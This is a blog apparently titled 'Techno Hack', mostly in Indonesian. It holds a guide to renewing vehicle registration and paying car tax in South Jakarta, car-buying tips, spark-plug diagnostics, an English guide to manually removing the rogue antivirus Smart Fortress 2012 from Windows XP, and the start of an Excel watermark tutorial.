Techno Hack

Perpanjang STNK dan Pembayaran Pajak Kendaraan Bermotor

2017-05-05T23:51:00.003+07:00

Source:
http://library.monx007.com/automotive/perpanjang_stnk_dan_pembayaran_pajak_kendaraan_bermotor/1

Berdasarkan peraturan yang ada di Indonesia, setiap pemilik kendaraan bermotor wajib membayar pajak Kendaraan Bermotor setiap tahun dan wajib memperpanjang STNK setiap 5 tahun. Nah, berikut hasil reporting dalam melakukan pembayaran pajak Kendaraan Bermotor maupun memperpanjang STNK.

Untuk mempermudah, tulisan ini dibagi dalam 6 kategori:
1. Dokumen yang perlu disiapkan
2. Cek Fisik Kendaraan (Khusus untuk Perpanjangan STNK)
3. Pembayaran Pajak Kendaraan Bermotor
4. Overal Process Time
5. Biaya
6. Informasi Lain

Beberapa petualangan ini terjadi di bulan Oktober 2008 (untuk perpanjangan STNK) dan di bulan September 2009 (untuk pembayaran pajak Kendaraan Bermotor). Lokasi kejadian berada di KOMDAK Jakarta Selatan. Berdasarkan informasi yang didapat Penulis pada tahun 2008, Pembayaran Pajak Kendaraan Bermotor dan Perpanjangan STNK dapat dilakukan di KOMDAK Jakarta Selatan hanya bagi pemilik kendaraan yang berdomisili di Jakarta Selatan.

Dokumen Yang Perlu Disiapkan
Dokumen yang perlu disiapkan adalah:
1. KTP (optional: beserta fotocopy)
2. STNK (optional: beserta fotocopy)
3. BPKB (optional: beserta fotocopy)

Lalu siapkan uang tunai karena saat itu belum ada Pembayaran via Kartu Debet (kecuali Kartu Debit Bank DKI) maupun Kartu Kredit. Tetapi jangan khawatir, di lokasi Gedung Samsat (tempat Pembayaran Pajak Kendaraan Bermotor) terdapat ATM Bank DKI (ATM Bersama) serta Kantor Kas Bank DKI.

Cek Fisik Kendaraan
Report Date: Oktober 2008

Untuk menghindari antrian, usahakan agar sampai di KOMDAK sekitar jam 08:00 pagi.

Setelah mobil memasuki KOMDAK dan melewati gerbang tiket karcis, beberapa meter kemudian langsung putar balik kiri, serta ikuti arah panah 'Cek Fisik'. Di tempat tersebut sudah banyak petugas yang akan memeriksa kendaraan kita.

Perlihatkanlah STNK kepada Petugas. Selanjutnya petugas tersebut akan memeriksa nomor mesin dan nomor rangka kendaraan kita. Setelah menggesek nomor mesin dan nomor rangka menggunakan label khusus, petugas akan menyatukan dengan Formulir Pendaftaran Cek Fisik. Ambil Formulir Pendaftaran Cek Fisik tersebut dan pastikan nomor kendaraan kita sudah tertera pada formulir tersebut.

Setelah itu parkirlah mobil kita di tempat yang telah disediakan di depan gedung Samsat (yang biasanya digunakan untuk pengurusan pembayaran pajak kendaraan bermotor). Selanjutnya kembali ke tempat Cek Fisik dan berikan Formulir Pendaftaran Cek Fisik ke loket 3/3A.

Tunggu sampai dipanggil dan akan diberikan Formulir Hasil Cek Fisik di loket yang telah disediakan (apabila tidak salah di loket 6, ada tulisan 'Ambil Hasil Cek').

Proses Cek Fisik memakan waktu sekitar 25 menit dari pemeriksaan kendaraan sampai dengan mendapatkan Formulir Hasil Cek Fisik.

Selanjutnya kita melakukan Pembayaran Pajak Kendaraan Bermotor.

Pembayaran Pajak Kendaraan Bermotor
Bagian ini dibagi menjadi 3 sub bagian, yaitu Drive Thru, Non Drive Thru dan Pembayaran Pajak Kendaraan Bermotor Yang Diwakilkan.

Fasilitas Drive Thru (Informasi Per Tanggal: 28 November 2015)
Per September 2009, Kepolisian RI telah menyediakan fasilitas Drive Thru di KOMDAK, Jakarta Selatan, untuk pembayaran pajak Kendaraan Bermotor, khusus Kendaraan Roda 4 (Mobil). Fasilitas Drive Thru tidak berlaku untuk Anda yang melakukan perpanjangan STNK. Untuk menggunakan Fasilitas Drive Thru ini, diharapkan Anda membawa mobil yang sedang diurus perpanjangan pajak Kendaraan Bermotor nya.

Sebelum Anda menggunakan Fasilitas Drive Thru, pastikan Anda menyiapkan uang tunai apabila Anda tidak mempunyai kartu debit Bank DKI. Atau Anda dapat mengambil terlebih dahulu di ATM Bank DKI (ATM Bersama) yang berada di dalam Gedung Samsat.

Setiba Anda sampai di KOMDAK, arahkan mobil Anda ke Gedung Samsat, lalu ikuti arah panah Drive Thru yang terdapat pada aspal jalan. Lokasi Masuk Drive Thru berada di sebelah Kanan.

Sebelum sampai loket 1, pastikan Anda telah menyiapkan STNK asli, KTP asli dan BPKB asli. Serahkan dokumen tersebut kepada petugas di loket 1. Selanjutnya petugas akan memeriksa kelengkapan dan keaslian dokumen. Setelah selesai, petugas akan mengembalikan asli STNK dan asli BPKB, sedangkan resi Pajak Kendaraan Bermotor yang lama tetap dipegang oleh petugas. Untuk jumlah pembayaran dan nomor plat kendaraan Anda, Anda dapat melihat pada papan display yang tergantung di arah depan atas Anda.

Selanjutanya bergeraklah ke loket 2. Apabila Anda mempunyai Kartu Debit Bank DKI, Anda dapat melakukan pembayaran secara non tunai. Apabila tidak, persiapkan uang tunai Anda. Bayar sejumlah yang tertera pada papan display kepada petugas kasir Bank DKI. Setelah dihitung dan sesuai jumlahnya, petugas Kasir akan menyerahkan Resi Pajak Kendaraan Bermotor Anda yang baru.

Selanjutnya terserah Anda, aka. Proses Pembayaran Pajak Kendaraan Bermotor Anda telah selesai.

Non Drive Thru (Informasi Per Tanggal: Oktober 2008)
Setelah memasuki Gedung Samsat, ambillah formulir di loket 1. Isilah formulir sesuai dengan petunjuk pengisian yang banyak ditempel di meja-meja pengisian yang telah disediakan.

Selanjutnya, siapkan fotocopy STNK, KTP dan BPKB. Apabila kita belum memfotocopy dokumen-dokumen tersebut, jangan khawatir karena di lantai tersebut terdapat petugas fotocopy.

Satukan dokumen-dokumen tersebut sesuai urutan sebagai berikut:
1. Form Hasil Cek Fisik (Khusus bagi yang memperpanjang STNK)
2. STNK (Asli lalu Fotocopy)
3. KTP (Asli lalu Fotocopy)
4. BPKB (Asli lalu Fotocopy)

Bingung dengan urutan tersebut? Jangan khawatir, Fotocopy saja dokumen-dokumen tersebut di petugas Fotocopy, dan selanjutnya petugas Fotocopy akan mengurutkan dokumen tersebut untuk Anda. Praktis, bukan?

Selanjutnya serahkan dokumen-dokumen tersebut ke loket 1A/1B. Petugas akan memeriksa dokumen-dokumen tersebut dan selanjutnya akan memberikan nomor urut antrian guna pengambilan kuitansi dan asli BPKB.

Tunggu Antrian sampai dipanggil, lalu ambil KTP asli, BPKB asli serta kuitansi biaya di loket 1D. Selanjutnya lakukan pembayaran di loket pembayaran di loket 2A. Anda akan mendapatkan bukti pembayaran untuk pengambilan STNK asli.

Selanjutnya tunggulah (sekitar 30 menit setelah pembayaran) sampai Nomor Kendaraan Anda dipanggil untuk pengambilan STNK asli di loket 2B.

Bagi Anda yang hanya melakukan Pembayaran Pajak Kendaraan Bermotor, proses selesai sampai disini. Anda boleh pulang.

Nah, bagi Anda yang melakukan Perpanjangan STNK, Anda baru dapat mengambil Plat Nomor Kendaraan Bermotor yang baru diatas jam 14:00 WIB, atau dapat juga diambil di lain hari.

Pengambilan plat yang baru cukup dengan menunjukkan lembar pembayaran yang putih di loket yang terletak di sebelah kanan loket 2B.

Pembayaran Pajak Kendaraan Bermotor Yang Diwakilkan (Informasi Per Tanggal: 03 Mei 2017)
Adakalanya Pemilik Kendaraan Bermotor berhalangan untuk dapat melakukan proses Pembayaran Pajak Kendaraan Bermotornya, sehingga diwakilkan kepada orang lain. Dengan menggunakan perwakilan, Anda diwajibkan untuk mempersiapkan dokumen pendukung yang dibedakan berdasarkan Alamat Pemilik Kendaraan Bermotor dengan Alamat Orang Yang Mewakili sebagai berikut:

- Apabila alamat Pemilik Kendaraan Bermotor berbeda dengan alamat orang yang mewakili, maka diperlukan Surat Kuasa yang dibubuhi Materai. KLIK DISINI untuk mengunduh Template Dokumen Surat Kuasa Pembayaran Pajak Kendaraan Bermotor.

Catatan: Link akan membuka jendela baru ke situs FileFactory. Apabila Anda tidak memiliki Premium Account FileFactory, maka Anda dapat meng-klik tombol "Slow Download" di bagian bawah. Tunggu beberapa detik sampai muncul Tombol "Start Download". Klik pada Tombol "Start Download" untuk memulai proses download.

- Sedangkan apabila alamat Pemilik Kendaraan Bermotor sama dengan alamat orang yang mewakili, maka cukup dengan fotocopy Kartu Keluarga dan fotocopy KTP orang yang mewakili. Terkadang hanya diperlukan fotocopy Kartu Keluarga, dan juga terkadang hanya diperlukan fotocopy KTP orang yang mewakili. Sehingga Penulis menyarankan agar Anda mempersiapkan kedua dokumen tersebut.

Selain Surat Kuasa atau dokumen pendukung diatas, untuk dokumen-dokumen yang diperlukan dapat Anda lihat pada bagian Dokumen Yang Perlu Disiapkan diatas.

Setelah Anda mempersiapkan dokumen-dokumen yang dibutuhkan beserta fotocopy-nya, maka selanjutnya Anda diwajibkan untuk mengisi Formulir Permohonan STNK / STCK. KLIK DISINI untuk melihat contoh pengisian Formulir Permohonan STNK / STCK.

Langkah berikutnya adalah menyerahkan dokumen-dokumen tersebut kepada Petugas untuk dilakukan verifikasi. Apabila verifikasi selesai, maka BPKB akan dikembalikan kepada Anda, sedangkan untuk STNK lama beserta KTP Pemilik Kendaraan akan disampaikan kepada Petugas Bank terdekat. Selanjutnya Petugas Bank akan menginformasikan total biaya yang harus Anda bayarkan.

Setelah Anda melakukan pembayaran, maka STNK beserta KTP Pemilik Kendaraan Bermotor akan dikembalikan kepada Anda.

Overal Process Time

Proses Cek Fisik Kendaraan sampai dengan STNK selesai diproses di KOMDAK cukup cepat, hanya memakan waktu 1.5 jam, yaitu dari pukul 08:00 WIB s/d 09:30 WIB.

Process Pembayaran Pajak menggunakan Fasilitas Drive Thru hanya memakan waktu 5 menit.

Biaya

Selain biaya fotocopy (apabila kita menggunakan jasa petugas fotocopy), terdapat biaya sebagai berikut:
1. PKB [Pajak Kendaraan Bermotor]: Rp. 885.000,- (Berbeda-beda setiap kendaraan)
2. SWDKLJJ [Sumbangan Wajib Dana Kecelakaan Lalu Lintas]: Rp. 143.000,- (sepertinya berbeda-beda setiap kendaraan)
3. Biaya Administrasi STNK: Rp. 50.000,- (Informasi Per Tanggal 03 Mei 2017)
4. Biaya Administrasi TNKB [Tanda Nomor Kendaraan Bermotor - Plat Nomor]: Rp. 20.000,-

INFORMASI LAIN

Waktu Operasional Kantor
Senin-Jumat: 08:00 WIB - 15:00 WIB
Sabtu: 08:30 WIB - 12:00 WIB
Istirahat: 12:00 WIB - 13:00 WIB

Untuk memasuki Gedung Samsat, diharapkan Anda menggunakan Sepatu.

Terdapat Customer Service di dekat pintu masuk Gedung Samsat.

Kantin Umum terletak di dekat pintu keluar KOMDAK, disebelah Indomaret.

Meskipun secara umum pelayanan di KOMDAK sudah sangat memuaskan, akan tetapi terdapat beberapa celah yang dapat dimanfaatkan oleh oknum-oknum, yaitu:
1. Penawaran 'bantuan' di tempat Pengisian Formulir
2. Penawaran 'bantuan' di tempat parkir
3. Penawaran 'bantuan' untuk pengambilan plat nomor kendaraan agar lebih cepat diperoleh.

Secara keseluruhan, kami 85% PUASSSSSSS !!! mwe he he he he
But, For Drive Thru Facility, we 99% SATISFIED !!!! Mwe hehehehehehe

Informasi Gerai Perpanjang STNK dan SIM di Blok M Square (Informasi Per Tanggal: 03 Mei 2017)
Lantai: Basement
Jam Operasional:
- Senen s/d Jumat = 09:30 - 15:00 WIB
- Sabtu = 09:30 - 12:00 WIB

Jam Istirahat:
- Senen s/d Kamis = 12:00 - 13:00 WIB
- Jumat = 11:30 - 13:30 WIB

Pendaftaran Terakhir (dimungkinkan pendaftaran ditutup lebih awal apabila pemohon ramai / banyak):
- Senin s/d Jumat = 14:30 WIB
- Sabtu = 11:30

Biaya Pajak Kendaraan Mobil KIA Picanto SE 1.2 MT (Tahun Pembuatan: 2012) untuk domisili daerah Jakarta Selatan
Tanggal: 28 November 2015
- PKB (Pajak Kendaraan Bermotor) = Rp 1.800.000,-
- SWDKLLJ (Sumbangan Wajib Dana Kecelakaan Lalu Lintas) = Rp 143.000,-

Tanggal: 05 Desember 2016
- PKB (Pajak Kendaraan Bermotor) = Rp 1.806.000,-
- SWDKLLJ (Sumbangan Wajib Dana Kecelakaan Lalu Lintas) = Rp 143.000,-

Biaya Pajak Kendaraan Mobil Mitsubishi Mirage 1.2L GLX4X2 MT (Tahun Pembuatan: 2012) untuk domisili daerah Jakarta Selatan
Tanggal: 03 Mei 2017
- PKB (Pajak Kendaraan Bermotor) = Rp 1.953.000,-
- SWDKLLJ (Sumbangan Wajib Dana Kecelakaan Lalu Lintas) = Rp 143.000,-

Tips Membandingkan Mobil Yang Akan Dibeli

2017-02-16T00:10:00.003+07:00

SUMBER:
http://library.monx007.com/automotive/tips_membandingkan_mobil_yang_akan_dibeli/1

Seiring perkembangan zaman, kebutuhan akan mobil semakin lama semakin meningkat. Tidak seperti pada zaman dahulu, mobil dianggap sebagai salah satu barang mewah dan hanya dimiliki oleh orang-orang tertentu dan orang-orang kaya saja. Dalam membeli mobil, sering kita dihadapkan dengan beragam pilihan jenis mobil baru dengan berbagai kelebihan dan kekurangannya.

Pada artikel ini, Penulis ingin membagikan beberapa aspek yang dapat membantu dalam memilih mobil yang kita idam-idamkan. Beberapa aspek yang dapat kita gunakan untuk membantu dalam pemilihan mobil adalah sebagai berikut:

1. Jumlah Silinder Mesin Mobil.
Saat ini terdapat berbagai macam pilihan mobil dengan aneka ragam jumlah silinder mesin yang digunakan, ada yang 2 silinder, 3 silinder, 4 silinder dan lain sebagainya. Pada umumnya semakin banyak jumlah silinder, maka tenaga mesin semakin meningkat serta hentakan pergerakan mesin (serta engine braking) juga semakin stabil (semakin halus). Sedangkan apabila jumlah silinder semakin sedikit, pada umumnya konsumsi bahan bakar semakin irit, akan tetapi hentakan pergerakan mesin (serta engine braking) akan semakin terasa.

Ada pendapat yang mengatakan, lebih baik memilih mobil yang menggunakan jumlah silinder genap, agar mesin tidak 'pincang'.

2. CC Mesin
Mirip dengan point 1 diatas, dimana pada umumnya semakin tinggi CC (Centimeter Cubic) suatu mobil, maka tenaga mesin semakin meningkat serta hentakan pergerakan mesin (serta engine braking) juga semakin stabil (semakin halus). Sedangkan apabila CC semakin kecil, pada umumnya konsumsi bahan bakar semakin irit, akan tetapi hentakan pergerakan mesin (serta engine braking) akan semakin terasa.

3. Takometer
Takometer atau Alat Penunjuk RPM adalah alat yang digunakan untuk mengukur kelajuan putaran cakera atau enjin di dalam motor atau mesin lain (sumber: Wikipedia). Dengan adanya Takometer ini, kita akan dapat mengetahui tingkat putaran mesin, sehingga membantu kita untuk menghindari putaran mesin yang terlalu tinggi. Apabila kita terlalu sering mengendari mobil dalam putaran mesin yang terlalu tinggi, maka pada umumnya mesin mobil akan cepat aus.

4. Side Lamp
Side Lamp atau lampu sign yang ada di sebelah kiri dan kanan mobil (pada umumnya di sisi samping depan mobil), akan sangat membantu mobil lain untuk mengetahui arah laju mobil kita. Sehingga akan sangat membantu dalam menghindari kecelakaan lalu lintas. Saat ini ada juga Side Lamp yang ditempatkan pada kaca spion kiri dan kanan mobil.

5. Brake Lamp di Bagian Belakang Atas
Brake Lamp atau Lampu Rem yang terdapat di bagian belakang mobil (di bagian atas) akan sangat berguna bagi mobil-mobil kecil, agar mobil-mobil yang lebih besar (terutama Bis dan Truk) yang ada di belakangnya dapat lebih mengetahui apabila mobil kita sedang mengerem.

6. Air Bag
Air Bag adalah suatu fitur di mobil yang berguna apabila mobil kita mengalami benturan yang sangat kencang, sehingga pengemudi terhindar dari benturan dengan obyek-obyek yang ada di depan (misalnya Setir ataupun dashboard mobil). Pada umumnya cara kerja Air Bag adalah ketika mobil kita mengalami benturan kencang, maka Air Bag yang tersimpan (misalkan di Setir atau di Dashboard mobil) akan secara otomatis terisi udara dan mengembang sehingga bagian tubuh kita (misal kepala) yang terhentak ke depan akan 'terjaga' oleh Air Bag yang mengembang tersebut.

7. MP3 Player
Dengan tersedianya perangkat MP3 Player di mobil kita, maka akan tersedia beraneka ragam lagu yang dapat kita dengarkan di mobil kita.

8. CD Changer
Apabila Anda lebih menyukai mendengarkan musik melalui media CD, maka alangkah baiknya apabila mobil mempunyai perangkat CD Changer, sehingga Anda dapat mendengarkan musik-musik yang berasal dari CD-CD dengan mudah.

9. USB Port
Bila Mobil yang Anda incar mempunyai fitur USB Port, maka Anda dapat menyimpan file-file musik (seperti .mp3) di USB serta memainkan musik-musik tersebut di Mobil Anda. Pada umumnya, Mobil yang mempunyai fitur USB Port, juga mempunyai fitur MP3 Player.

10. ABS
Fitur ABS (Anti Brake System) ini berguna untuk mencegah rem terkunci ketika mobil dilakukan pengereman dalam dan mendadak. Menurut Penulis, apabila Anda jarang mengemudi dalam kecepatan tinggi, maka fitur ini sebagai opsional. Dikarenakan harga antara mobil dengan merk dan tipe sama, antara yang mempunyai fitur ABS dengan yang tidak mempunyai fitur ABS, mempunyai perbedaan harga yang tidak sedikit.

11. Power Window
Fitur ini berguna untuk menaikkan maupun menurunkan jendela mobil secara elektronik. Dan pada umumnya di bagian pengemudi juga terdapat remote yang dapat mengatur keseluruhan jendela di mobil.

12. Central Lock
Fitur untuk mengunci semua pintu yang dikontrol dari bagian Pengemudi. Pada umumnya, kendaraan saat ini telah dilengkapi dengan fitur Central Lock.

13. Electric Spion
Fitur ini berguna untuk mengatur kaca spion melalui remote yang terletak di bagian pengemudi. Menurut Penulis, fitur Electric Spion sangat diperlukan khususnya untuk Spion sebelah kiri (di bagian Penumpang depan), karena sangat membantu ketika Pengemudi, apalagi mobil sedang dikendarai oleh Pengemudi sendiri. Sedangkan untuk spion di sebelah kanan (di bagian Pengemudi), menurut Penulis tidak sepenting Spion di sebelah kiri, karena Pengemudi dapat dengan mudah mengatur Spion di sebelah kanan tersebut.

14. Vanity Mirror
Vinity Mirror atau Kaca Solek adalah Kaca / Cermin yang pada umumnya terletak di bagian Penumpang Depan. Apabila Anda sering bersolek atau sering memandangi diri Anda, maka pastikan fitur Vanity Mirror ada di mobil yang Anda incar.

15. Tersedia untuk Trade In
Apabila Anda hendak mengganti mobil yang Anda miliki saat ini, maka aspek Trade In juga dapat menjadi salah satu aspek yang dapat Anda gunakan untuk perbandingan.

16. Ketersediaan Bengkel
Pastikan perusahaan pembuat mobil yang Anda incar memiliki bengkel-bengkel yang dapat Anda akses dengan mudah, baik untuk perawatan mobil maupun untuk perbaikan mobil.

17. Dapat Upgrade Klakson?
Dengan tingkat keramaian dan kompleksitas jalanan di kota-kota besar, seperti di Jakarta, Anda membutuhkan klakson yang lebih 'menggelegar' dibandingkan dengan klakson standar yang terpasang pada mobil-mobil pada umumnya.

Di After Market, banyak tersedia klakson-klakson yang 'menggelegar' seperti klakson Hela Keong.

Cek klakson pada mobil yang Anda incar. Apabila belum 'menggelegar', mintalah kepada Sales untuk mengganti klakson mobil yang Anda incar sebagai bonus.

18. Kaca Film
Selain untuk melindungi sinar matahari, Kaca Film juga dapat meminimalisir serpihan dari kaca mobil yang pecah.

Anda dapat meminta kepada Sales untuk pemasangan Kaca Film sebagai bonus apabila Kaca Film belum ada di mobil yang Anda incar.

19. Karpet Dasar
Karpet Dasar adalah karpet yang menutupi seluruh bagian dasar mobil, biasanya dipasang diatas karpet dasar bawaan mobil yang bahannya beludru. Tujuannya ditambah karpet dasar ini adalah demi kebersihan dan kenyamanan, karena kotoran (baik serpihan tanah ataupun pasir ataupun tumpahan air) tidak akan jatuh di karpet dasar beludru yang menyulitkan pembersihan. Selain itu juga berfungsi sebagai peredam suara, maksudnya berfungsi meredam suara terutama dari bagian bawah mobil seperti deru ban, dan lain sebagainya.

Pada umumnya bahan dari karpet dasar adalah dari kulit sintetis yang tahan air dan mudah dibersihkan (sehingga apabila ketumpahan air, hanya perlu dilap dan tidak akan meninggalkan noda yang sulit dibersihkan).

Pastikan Anda meminta kepada Sales untuk pemasangan Karpet Dasar sebagai bonus apabila mobil yang Anda incar belum mempunyai karpet dasar yang berbahan non beludru.

20. Alarm
Jika mobil yang Anda incar belum mempunyai Alarm, Anda dapat meminta kepada Sales untuk memasang Alarm mobil sebagai bonus.

21. Garansi
Ketika membeli mobil, pastikan Anda mengetahui garansi dari mobil yang Anda incar. Garansi dapat berupa garansi spare parts dan ada juga garansi service.

22. INT Wiper
Fungsi INT Wiper atau Intermittent Wiper adalah fungsi yang akan membuat Wiper menyapu kaca depan dalam jeda waktu tertentu. Fungsi INT Wiper akan sangat membantu ketika mobil dikendarai dalam cuaca hujan gerimis dengan curah yang tidak terlalu besar.

23. Merk
Merk mobil dapat Anda gunakan juga sebagai aspek pembanding. Anda tentu tidak mau membeli mobil yang mempunyai merk yang baru pertama kali Anda dengar, bukan?

24. Harga
Aspek Harga merupakan salah satu hal yang penting dalam menentukan mobil yang akan Anda beli. Sesuaikan dengan bugdet Anda yang tersedia, baik dari Kas Anda atau Anda dapat mengajukan Kredit Kepemilikan Kendaraan Bermotor. Saat ini sudah banyak tersedia perusahaan-perusahaan pembiayaan Kendaraan Bermotor atau Anda juga dapat mengajukan kredit dari Bank-Bank.

25. Child Lock
Fitur yang pada umumnya digunakan untuk mengunci pintu belakang mobil, sehingga pintu belakang mobil tidak dapat dibuka dari dalam. Dengan adanya fitur ini, apabila Anak Anda duduk di belakang akan aman, karena si Anak tidak dapat membuka pintu dari dalam.

26. Electric Spion Folded
Fitur ini memungkinkan Pengemudi untuk melipat spion secara remote.

27. Posisi Mesin
Dalam memilih mobil, pastikan Anda mengetahui posisi mesin mobil yang Anda incar. Untuk posisi mesin mobil di bawah jok, secara umum kelemahannya adalah kabin akan terasa panas akibat dari hawa panas yang dikeluarkan oleh mesin mobil.

28. Indent
Anda juga harus mengetahui apakah stok mobil yang Anda incar ready stock atau Anda harus menunggu dalam waktu tertentu (indent). Sebaiknya Anda memilih mobil yang ready stock, dikarenakan apabila indent, Anda tidak akan mengetahui secara pasti kapan Mobil yang Anda idam-idamkan tersebut akan mampir ke garasi Anda.

29. Pijakan Kaki Kiri Pengemudi
Fitur ini akan membuat kaki kiri Anda lebih lega karena dapat lebih direnggangkan.

Selain aspek-aspek diatas, ada juga calon konsumen yang menggunakan aspek pembanding tingkat konsumsi bahan bakar (tingkat keiritan) dalam menentukan pembelian mobil. Pada umumnya, informasi tingkat keiritan bahan bakar pada mobil dapat ditemui di majalah maupun situs automotive. Menurut pandangan Penulis, penggunaan informasi tingkat keiritan konsumsi bahan bakar dalam menentukan pemilihan mobil yang akan dibeli, dapat 'menyesatkan'. Karena banyak faktor yang menentukan tingkat keiritan suatu mobil, diantaranya adalah:
- Tingkat Kemacetan di jalan yang dilalui dalam pengetesan. Semakin sering mobil melakukan 'Stop and Go' (melakukan akselerasi dan pengereman), maka pada umumnya akan membuat mobil boros bahan bakar.
- Kecepatan Mobil yang dikendarai. Semakin 'stabil' kecepatan mobil, maka pada umumnya akan semakin menghemat bahan bakar mobil tersebut.
- Metode pengukuran yang dilakukan dalam pengetesan tingkat keiritan konsumsi bahan bakar.

How To Manually Remove Smart Fortress 2012 In Windows XP

2012-04-15T21:04:00.002+07:00

What is Smart Fortress 2012? (This definition taken from http://www.xp-vista.com site)

Smart Fortress 2012 is a malicious application, which is made to look like a genuine anti-virus programs. This creation of the hackers uses malicious advertising methods in order to gain profit by unsuspecting users. Programs like Smart Fortress 2012 are also called rogue antivirus software. It uses a variety of scare-tactics in order to make the victims believe their computers have been infected. Then, the phony program will push the users to purchase its fake full version.

To begin with, Smart Fortress 2012 uses the help of Trojans, laid in compromised websites, in order to penetrate into the targeted machines. Only a click on the website is enough for the Trojans to be dropped on computer system through security holes, found in it. Such vulnerabilities are mainly caused by outdated software. Therefore, we highly recommend you to keep all your programs up-to-date. It is even more important to download the updates of a given product only from its official website. Everyone should avoid downloading from file-sharing services and P2P networks.

As soon as the Trojans manage to enter the PC, they immediately bring Smart Fortress 2012 inside, as well. The rogue’s first task is to create a random folder and then place a malicious file in it. After that, the rogue program configures itself to be launched automatically as soon as Windows starts. From that point on, every time the victim turns the computer on, Smart Fortress 2012's window appears on the screen and makes a pretend scan of the system.

The scans, performed by Smart Fortress 2012 are all phony. Their main purpose is to frighten the user into believing that there is a number of viruses in the machine. The list presented as a result of the scans does not include the names of the presumable infections. Then, the victim is prompted to purchase the so-called full version of this fake software, which is promoted as the best solution to the security problems found by the scans. The truth is that even the full version of this program is a scam – it cannot detect or remove viruses, because it is a virus itself.

The other scare-strategy used by Smart Fortress 2012 involves bogus alerts and messages. They state that the computer has been infected and once again urge the user to buy the fake software.

These notifications are extremely annoying, because they appear constantly and even purchasing the application will not stop them. What is more, they slow down the PC immensely.

In addition to the rest of its mischief, Smart Fortress 2012 also changes the victim’s Windows Registry. This gives the rogue a chance to prevent other programs from being launched. When the user tries to run a program, a fake Smart Fortress 2012 warning appears, which declares that the requested program has been corrupted.

There is probably no need to say that spending your money on Smart Fortress 2012 is a great mistake. This application is smart indeed – a smart scam. Do not let it victimize you. Treat it accordingly – eliminate it as soon as possible, with the help of a genuine anti-virus tool.

How To Manually Remove Smart Fortress 2012 In Windows XP
1. Reboot your computer. When you see anything on the screen, immediately start tapping the F8 key on your keyboard. Eventually you will be brought to a menu similar to the one below:

Choose Safe Mode and then press Enter.

2. When the login prompt shows up, you must login with your account that had been infected by Smart Fortress 2012.

3. After your Window Desktop appear, click at the Start Program button, then look for Smart Fortress 2012 folder. If you found it, then right click at the Smart Fortress 2012 program (not the folder), and choose Properties. Look at the "Start in" value. Mine look like this: "C:\Documents and Settings\All Users\Application Data\B7E85B32000475AA0000039CD151FC4E\"

4. Copy the folder location, example: C:\Documents and Settings\All Users\Application Data\B7E85B32000475AA0000039CD151FC4E

5. Open your Windows Explorer, then paste the folder location at the Address Bar, and press Enter button.

6. At the folder location, you will see an exe file. Rename the exe file.

7. Reboot your Windows into Safe Mode with Networking by pressing F8 button when Windows started. After you've pressed the F8 button, then there will be Window Advanced Options Menu, similar to point 1 above. Choose Safe Mode with Networking.

8. When the login prompt shows up, you must login with your account that had been infected by Smart Fortress 2012.

9. After that, click at the Start Program button, then click at Control Panel, and remove the Smart Fortress 2012 program.

10. Restart your Windows normally.

11. Remove the folder and all of the files within it at point 4 above.

12. Remove the Smart Fortress 2012 shortcut button at your Desktop.

13. Remove the Smart Fortress 2012 at the Start Program Menu by click at the Start Program button, then look for Smart Fortress 2012 folder. If you found it, then right click at the Smart Fortress 2012 folder, and choose Properties. Copy the folder location, and then open your Windows Explorer, then paste the folder location at the Address Bar, and press Enter. Go up one directory and delete the Smart Fortress 2012 folder.

Congrulations, you just remove the Smart Fortress 2012 completely from your Computer.

SOURCE:
http://library.monx007.com/computer/how_to_manually_remove_smart_fortress_2012_in_windows_xp/1

Kenali Kondisi Mesin Dari Busi

2012-02-05T19:19:00.000+07:00

Kecil wujudnya, tetapi besar fungsinya. Ungkapan ini tampaknya tepat untuk menggambarkan peran busi dalam sistem mesin kendaraan bermotor. kendati berwujud kecil, busi memegang peran vital dalam proses pembakaran untuk menghasilkan tenaga sehingga kendaraan dapat melaju.

Salah satu komponen yang diperlukan untuk menghidupkan mesin mobil adalah busi. Komponen ini bertugas menghasilkan bunga api listrik untuk membakar campuran bahan bakar udara dalam silinder kendaraan. Busi yang baik mampu bekerja dalam suhu dan tekanan tinggi.

Karena berkaitan langsung dengan kerja mesin, busi pun dapat digunakan untuk mengetahui dan mencari penyebab gangguan pada mesin. Oleh karena itu, saat membersihkan busi, Anda sekaligus bisa memeriksa, apakah kondisi mesin masih prima atau sudah loyo, hanya dengan mengamati bagian kepada busi.

Mesin kendaraan disebut masih normal jika ujung insulator dan elektroda busi berwarna abu-abu terang atau coklat kemerahan. Ini menunjukkan kondisi dan setting mesin, serta waktu pengapian dalam keadaan prima dan masih sesuai dengan keadaan pabrik.

Sementara itu, kalau Anda melihat ujung insulator, elektrode, dan busi tertutup dengan jelaga hitam, sisa pembakaran yang kering tetapi lembut, sebaiknya Anda lekas memeriksa setelan atau injeksi, mekanisme cuk, saringan udara, kalau perlu mengganti busi yang sesuai, karena kemungkinan besar ada yang kurang pas pada bagian-bagian tersebut. Gangguan pada komponen-komponen tadi akan menyebabkan asap knalpot mobil menjadi hitam, bensin boros, serta sukarnya start saat mesin sedang dingin.

Pernahkah Anda mengalami mesin mobil tersendat dan lambat berakselerasi saat kendaraan bermuatan penuh, atau knalpot meledak-ledak karena bahan bakar tidak terbakar habis (misfiring)? Kalau ya, periksalah busi Anda, pasti ujung insulatornya tampak berwarna kuning agak coklat muda dan terkadang muncul warna hijau agak basah. Ini menunjukkan bensin dan oli tercemar bahan lain seperti air atau pemakaian aditif yang kurang cocok.

CLICK HERE FOR MORE INFORMATION

Adding Watermark In Microsoft Excel

2011-10-08T23:04:00.000+07:00

Pernahkah Anda menyadari bahwa perusahaan sebesar Microsoft tidak menyediakan fasilitas Watermark untuk software Microsoft Excel, sedangkan kita dapat dengan mudah menemukan fasilitas Watermark pada software Microsoft Word ?

Nah, dengan langkah-langkah sederhana dibawah ini, Anda dapat dengan mudah menambahkan 'Watermark' pada file Microsoft Excel Anda.

SOFTWARE YANG DIBUTUHKAN
Software yang dibutuhkan adalah sebagai berikut:
- Adobe Photoshop atau Software Pengolah Gambar sejenis
- Microsoft Excel XP atau dibawahnya

LANGKAH PENGERJAAN
Langkah Pengerjaan dibagi menjadi 2 bagian utama, yaitu:
- Langkah 1: Pembuatan Gambar yang akan dijadikan sebagai 'Watermark'
- Langkah 2: Setting pada Microsoft Excel untuk dapat menampilkan 'Watermark' dari hasil langkah 1

LANGKAH 1: Pembuatan Gambar yang akan dijadikan sebagai 'Watermark'
Sebagai langkah pertama adalah kita harus membuat Gambar yang akan kita jadikan sebagai 'Watermark'. Sebagai contoh, saya menggunakan kata 'RAHASIA' sebagai Watermark dan menggunakan software Adobe Photoshop sebagai software Pengolah Gambar.

Langkah detailnya adalah sebagai berikut:
1. Bukalah Software Adobe Photoshop.
